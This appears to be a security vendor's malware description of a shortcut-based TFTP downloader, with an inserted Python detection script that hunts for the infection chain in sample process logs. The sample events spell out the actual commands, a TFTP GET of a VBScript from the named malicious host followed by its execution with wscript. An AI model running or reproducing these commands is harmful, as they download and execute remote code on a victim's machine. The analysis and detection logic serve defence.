Threat behavior
TrojanDownloader:BAT/Lnkget.AQ is a detection for a shortcut link that, when opened, connects to a remote server using TFTP (Trivial File Transfer Protocol) to download and execute arbitrary VBScript files.
Installation
TrojanDownloader:BAT/Lnkget.AQ may arrive on a computer either by being dropped or downloaded by other malware. When run, it attempts to connect to a TFTP server to download and execute arbitrary VBScript files.
Payload
Downloads and executes arbitrary files
TrojanDownloader:BAT/Lnkget.AQ attempts to download a VBScript file from the remote server "w11e.com" over TFTP. This file is saved as "%windir%\P.vbs" and then executed.
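The TFTP-then-execute chain described above is what a defender would hunt for in process-creation telemetry. The following is an added example, not part of this entry: it scans constructed, Sysmon-style process records (the field names and the assumption that the built-in Windows tftp client syntax "tftp [-i] host GET source [destination]" is used are mine) and flags a TFTP GET of a .vbs file, plus a script host later running a file with the same name as a TFTP download.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation records (not real telemetry).
# Field names loosely follow Sysmon Event ID 1 (an assumption).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "10:00:01", "image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\explorer.exe"'},
    {"time": "10:00:05", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c tftp -i w11e.com GET p.vbs C:\Windows\P.vbs"},
    {"time": "10:00:06", "image": r"C:\Windows\System32\tftp.exe",
     "cmdline": r"tftp  -i w11e.com GET p.vbs C:\Windows\P.vbs"},
    {"time": "10:00:07", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Windows\P.vbs"},
    # Benign-looking TFTP transfer of a non-script file: must not alert.
    {"time": "10:01:00", "image": r"C:\Windows\System32\tftp.exe",
     "cmdline": r"tftp 192.0.2.10 GET firmware.bin"},
]

# tftp [-i] <host> GET <source> [<destination>]  (Windows tftp.exe syntax)
TFTP_GET = re.compile(
    r"tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)(?:\s+(\S+))?", re.I)
# wscript/cscript launched with a .vbs argument
SCRIPT_HOST = re.compile(r"(?:^|\\)[wc]script(?:\.exe)?\b.*?(\S+\.vbs)", re.I)

Alert = Tuple[str, str, str]  # (rule, script name, tftp host)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_tftp_script_chains(events: List[Dict[str, str]]) -> List[Alert]:
    """Return de-duplicated alerts for TFTP script downloads and their execution."""
    downloaded: Dict[str, str] = {}  # local file basename -> TFTP host
    alerts: List[Alert] = []
    for ev in events:
        cmd = ev["cmdline"]
        m = TFTP_GET.search(cmd)
        if m:
            host, remote, local = m.group(1), m.group(2), m.group(3) or m.group(2)
            name = basename(local)
            downloaded[name] = host
            if name.endswith(".vbs"):
                alert = ("tftp_script_download", name, host)
                if alert not in alerts:
                    alerts.append(alert)
            continue  # a tftp command line is not a script-host launch
        m = SCRIPT_HOST.search(cmd)
        if m and basename(m.group(1)) in downloaded:
            name = basename(m.group(1))
            alert = ("script_exec_after_tftp", name, downloaded[name])
            if alert not in alerts:
                alerts.append(alert)
    return alerts
```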
Additional information
TrojanDownloader:BAT/Lnkget.AQ runs a VBScript (detected as TrojanDownloader:VBS/Small.AM), and contacts the TFTP server "w11e.com" to download and execute the following file:
When run, this malware drops a copy of itself under the <system folder> directory, with a file name consisting of five random characters. In the wild, we have observed the malware using the following file names:
Note: <system folder> refers to a variable location that the malware determines by querying the operating system. The default location of the System folder is C:\Winnt\System32 on Windows 2000 and NT, and C:\Windows\System32 on Windows XP, Vista and 7.
Once the trojan has completed its downloading routine, it redirects to the following site:
tw.match.yahoo.com
Analysis by Wei Li
Prevention